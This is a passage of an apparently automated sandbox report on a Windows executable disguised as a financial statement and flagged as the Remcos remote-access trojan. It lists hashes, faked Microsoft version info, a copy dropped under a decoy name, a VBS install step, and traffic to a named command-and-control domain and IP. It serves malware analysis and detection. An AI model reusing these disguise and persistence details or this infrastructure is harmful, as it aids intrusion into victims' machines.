                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0..Z...........y... ........@.. ....................................@..................................x..O............................`....................................................... ............... ..H............text...4Y... ...Z.................. ..`.rsrc................\..............@..@.reloc.......`.......,..............@..B.................y......H...........<J...........-...............................................*".(.....*^..}.....(#......(.....*...s%...}......(&..... ... ....s'...((.....(....o)....*&.(......*".......*".(-....*Vs....(....t.........*....0...........r...p....r...p....s............(...+o........88.......(............(........(.................(....o....&.....(............:...................o..........o........8........*..........j........0...........r...p....r.).p....s............(...+o........88
                                      C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe:Zone.Identifier
                                      Process:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:true
                                      Preview: [ZoneTransfer]....ZoneId=0

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):3.1643433187668584
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                      • Win32 Executable (generic) a (10002005/4) 49.97%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      File size:1912320
                                      MD5:2e91e5e3d39ce4155edad4f2a3acf916
                                      SHA1:58adf5d60d9da823a4fd62282c0c46134e20e47b
                                      SHA256:eb9e13fd092522e4dde08e96961117f9926e3ef70ca3b225f8c388e476541a21
                                      SHA512:5d27cd110e8d62d6d3e48f20ecd09c715fe5a98e7c9ce8042559f1d6e8a6ce0d666d262a536b2376b8e2d99beb7ce50dd53e238e2f37df118630945b5cbb4b87
                                      SSDEEP:24576:DFQF36FFFFFvFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFmFFFFFFFvlFFFFFFce5:6N
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..Z...........y... ........@.. ....................................@................................

                                      File Icon

                                      Icon Hash:e8d2aab2b2aac6e8

                                      Static PE Info

                                      General

                                      Entrypoint:0x5b792e
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                      Time Stamp:0x9BCFD6C0 [Fri Nov 1 15:56:48 2052 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al

                                      Data Directories

                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x1b78dc0x4f.text
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1b80000x1cfc8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x1d60000xc.reloc
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                      Sections

                                      NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x20000x1b59340x1b5a00False0.155268137675data2.63705355617IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                      .rsrc0x1b80000x1cfc80x1d000False0.501868938578data6.4735551931IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .reloc0x1d60000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                      Resources

                                      NameRVASizeTypeLanguageCountry
                                      RT_ICON0x1b83580x2e8data
                                      RT_ICON0x1b86400x128GLS_BINARY_LSB_FIRST
                                      RT_ICON0x1b87680xea8data
                                      RT_ICON0x1b96100x8a8data
                                      RT_ICON0x1b9eb80x6c8data
                                      RT_ICON0x1ba5800x568GLS_BINARY_LSB_FIRST
                                      RT_ICON0x1baae80x4dfePNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                      RT_ICON0x1bf8e80x10828dBase III DBT, version number 0, next free block index 40
                                      RT_ICON0x1d01100x25a8data
                                      RT_ICON0x1d26b80x10a8data
                                      RT_ICON0x1d37600x988data
                                      RT_ICON0x1d40e80x468GLS_BINARY_LSB_FIRST
                                      RT_GROUP_ICON0x1d45500xaedata
                                      RT_VERSION0x1d46000x3b4dataEnglishUnited States
                                      RT_MANIFEST0x1d49b40x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                      RT_MANIFEST0x1d4ba00x428XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States

                                      Imports

                                      DLLImport
                                      mscoree.dll_CorExeMain

                                      Version Infos

                                      DescriptionData
                                      LegalCopyright Microsoft Corporation. All rights reserved.
                                      InternalNameWABMIG.EXE
                                      FileVersion10.0.19041.1 (WinBuild.160101.0800)
                                      CompanyNameMicrosoft Corporation
                                      ProductNameMicrosoft Windows Operating System
                                      ProductVersion10.0.19041.1
                                      FileDescriptionMicrosoft (R) Contacts Import Tool
                                      OriginalFilenameWABMIG.EXE
                                      Translation0x0409 0x04b0

                                      Possible Origin

                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States

                                      Network Behavior

                                      Snort IDS Alerts

                                      TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                      04/29/21-06:04:29.595758ICMP399ICMP Destination Unreachable Host Unreachable190.255.84.57192.168.2.4

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 29, 2021 06:03:22.093986034 CEST497453521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:03:25.213989019 CEST497453521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:03:31.308777094 CEST497453521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:03:44.513653040 CEST497483521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:03:47.622138023 CEST497483521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:03:53.716386080 CEST497483521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:06.869000912 CEST497663521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:09.874087095 CEST497663521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:15.874754906 CEST497663521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:29.006686926 CEST497693521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:32.016485929 CEST497693521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:38.017028093 CEST497693521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:51.151000977 CEST497703521192.168.2.4190.255.84.57
                                      Apr 29, 2021 06:04:54.174685001 CEST497703521192.168.2.4190.255.84.57

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Apr 29, 2021 06:02:43.454569101 CEST4971453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:43.503628969 CEST53497148.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:43.859802008 CEST5802853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:43.908530951 CEST53580288.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:44.106476068 CEST5309753192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:44.172774076 CEST53530978.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:44.180191040 CEST4925753192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:44.229023933 CEST53492578.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:45.107434988 CEST6238953192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:45.174494028 CEST53623898.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:47.665630102 CEST4991053192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:47.730156898 CEST53499108.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:49.176529884 CEST5585453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:49.229974031 CEST53558548.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:50.348942995 CEST6454953192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:50.398953915 CEST53645498.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:51.423789024 CEST6315353192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:51.488185883 CEST53631538.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:52.381906986 CEST5299153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:52.433588982 CEST53529918.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:53.354599953 CEST5370053192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:53.406126976 CEST53537008.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:54.519345999 CEST5172653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:54.573196888 CEST53517268.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:55.749684095 CEST5679453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:55.817378998 CEST53567948.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:56.759664059 CEST5653453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:56.808357954 CEST53565348.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:57.842421055 CEST5662753192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:57.896568060 CEST53566278.8.8.8192.168.2.4
                                      Apr 29, 2021 06:02:59.254333973 CEST5662153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:02:59.303237915 CEST53566218.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:00.540998936 CEST6311653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:00.589854002 CEST53631168.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:01.472764015 CEST6407853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:01.537764072 CEST53640788.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:02.668081045 CEST6480153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:02.735783100 CEST53648018.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:03.937710047 CEST6172153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:03.986946106 CEST53617218.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:07.756164074 CEST5125553192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:07.807713032 CEST53512558.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:08.766443968 CEST6152253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:08.818208933 CEST53615228.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:12.206897974 CEST5233753192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:12.272460938 CEST53523378.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:14.767347097 CEST5504653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:14.817346096 CEST53550468.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:21.927835941 CEST4961253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:22.082907915 CEST53496128.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:26.437913895 CEST4928553192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:26.511660099 CEST53492858.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:38.330403090 CEST5060153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:38.400993109 CEST53506018.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:44.444633961 CEST6087553192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:44.511746883 CEST53608758.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:44.870590925 CEST5644853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:45.026945114 CEST53564488.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:45.482738018 CEST5917253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:45.547255039 CEST53591728.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:46.048403025 CEST6242053192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:46.103840113 CEST6057953192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:46.153162956 CEST53605798.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:46.184199095 CEST53624208.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:46.572345972 CEST5018353192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:46.642214060 CEST53501838.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:47.091453075 CEST6153153192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:47.155605078 CEST53615318.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:47.602248907 CEST4922853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:47.666398048 CEST53492288.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:47.971096039 CEST5979453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.049556971 CEST5591653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.051131010 CEST53597948.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:48.114056110 CEST53559168.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:48.672195911 CEST5275253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:48.736809969 CEST53527528.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:49.386353970 CEST6054253192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:49.453772068 CEST53605428.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:49.835624933 CEST6068953192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:49.901920080 CEST53606898.8.8.8192.168.2.4
                                      Apr 29, 2021 06:03:50.991413116 CEST6420653192.168.2.48.8.8.8
                                      Apr 29, 2021 06:03:51.062911034 CEST53642068.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:06.806560993 CEST5090453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:06.868102074 CEST53509048.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:23.020593882 CEST5752553192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:23.069497108 CEST53575258.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:23.697201014 CEST5381453192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:23.761574030 CEST53538148.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:28.928894043 CEST5341853192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:29.000085115 CEST53534188.8.8.8192.168.2.4
                                      Apr 29, 2021 06:04:51.080096960 CEST6283353192.168.2.48.8.8.8
                                      Apr 29, 2021 06:04:51.149888992 CEST53628338.8.8.8192.168.2.4

                                      ICMP Packets

                                      TimestampSource IPDest IPChecksumCodeType
                                      Apr 29, 2021 06:04:29.595757961 CEST190.255.84.57192.168.2.4d30a(Host unreachable)Destination Unreachable

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Apr 29, 2021 06:03:21.927835941 CEST192.168.2.48.8.8.80xaa7bStandard query (0)databasepropersonombrecomercialideasearchwords.servicesA (IP address)IN (0x0001)
                                      Apr 29, 2021 06:03:44.444633961 CEST192.168.2.48.8.8.80xcff4Standard query (0)databasepropersonombrecomercialideasearchwords.servicesA (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:06.806560993 CEST192.168.2.48.8.8.80xce61Standard query (0)databasepropersonombrecomercialideasearchwords.servicesA (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:28.928894043 CEST192.168.2.48.8.8.80xe884Standard query (0)databasepropersonombrecomercialideasearchwords.servicesA (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:51.080096960 CEST192.168.2.48.8.8.80x61ffStandard query (0)databasepropersonombrecomercialideasearchwords.servicesA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Apr 29, 2021 06:03:22.082907915 CEST8.8.8.8192.168.2.40xaa7bNo error (0)databasepropersonombrecomercialideasearchwords.services190.255.84.57A (IP address)IN (0x0001)
                                      Apr 29, 2021 06:03:44.511746883 CEST8.8.8.8192.168.2.40xcff4No error (0)databasepropersonombrecomercialideasearchwords.services190.255.84.57A (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:06.868102074 CEST8.8.8.8192.168.2.40xce61No error (0)databasepropersonombrecomercialideasearchwords.services190.255.84.57A (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:29.000085115 CEST8.8.8.8192.168.2.40xe884No error (0)databasepropersonombrecomercialideasearchwords.services190.255.84.57A (IP address)IN (0x0001)
                                      Apr 29, 2021 06:04:51.149888992 CEST8.8.8.8192.168.2.40x61ffNo error (0)databasepropersonombrecomercialideasearchwords.services190.255.84.57A (IP address)IN (0x0001)

                                      Code Manipulations

                                      Statistics

                                      CPU Usage

                                      Click to jump to process

                                      Memory Usage

                                      Click to jump to process

                                      High Level Behavior Distribution

                                      Click to dive into process behavior distribution

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      Analysis Process: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6880 Parent PID: 5864

                                      General

                                      Start time:06:02:49
                                      Start date:29/04/2021
                                      Path:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe'
                                      Imagebase:0xab0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.710784907.0000000004374000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.706118629.0000000003969000.00000004.00000001.sdmp, Author: Joe Security
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 7128 Parent PID: 6880

                                      General

                                      Start time:06:02:53
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 7136 Parent PID: 7128

                                      General

                                      Start time:06:02:54
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: timeout.exe PID: 6168 Parent PID: 7128

                                      General

                                      Start time:06:02:54
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\timeout.exe
                                      Wow64 process (32bit):true
                                      Commandline:timeout 1
                                      Imagebase:0xb30000
                                      File size:26112 bytes
                                      MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: EXTRACTOSERFINANZA989543704031499704092798964.exe PID: 6292 Parent PID: 6880

                                      General

                                      Start time:06:02:56
                                      Start date:29/04/2021
                                      Path:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\Desktop\EXTRACTOSERFINANZA989543704031499704092798964.exe
                                      Imagebase:0xab0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                      • Rule: Remcos_1, Description: Remcos Payload, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000007.00000002.664656928.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: wscript.exe PID: 6548 Parent PID: 6292

                                      General

                                      Start time:06:02:58
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\wscript.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\install.vbs'
                                      Imagebase:0x980000
                                      File size:147456 bytes
                                      MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: WerFault.exe PID: 1000 Parent PID: 6880

                                      General

                                      Start time:06:02:58
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6880 -s 1496
                                      Imagebase:0xbd0000
                                      File size:434592 bytes
                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: cmd.exe PID: 3400 Parent PID: 6548

                                      General

                                      Start time:06:03:01
                                      Start date:29/04/2021
                                      Path:C:\Windows\SysWOW64\cmd.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\System32\cmd.exe' /c 'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0x11d0000
                                      File size:232960 bytes
                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: conhost.exe PID: 5828 Parent PID: 3400

                                      General

                                      Start time:06:03:01
                                      Start date:29/04/2021
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff724c50000
                                      File size:625664 bytes
                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 5772 Parent PID: 3400

                                      General

                                      Start time:06:03:02
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Imagebase:0x8e0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.771805512.000000000559E000.00000004.00000001.sdmp, Author: Joe Security
                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.766450964.0000000002DE1000.00000004.00000001.sdmp, Author: Joe Security
                                      Antivirus matches:
                                      • Detection: 100%, Joe Sandbox ML
                                      • Detection: 11%, ReversingLabs
                                      Reputation:low

                                      Chronological Activities

                                      Analysis Process: PxxoServicesTrialNet1.exe PID: 6648 Parent PID: 3424

                                      General

                                      Start time:06:03:09
                                      Start date:29/04/2021
                                      Path:C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Users\user\AppData\Roaming\System32\PxxoServicesTrialNet1.exe'
                                      Imagebase:0xfd0000
                                      File size:1912320 bytes
                                      MD5 hash:2E91E5E3D39CE4155EDAD4F2A3ACF916
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:.Net C# or VB.NET
                                      Yara matches:
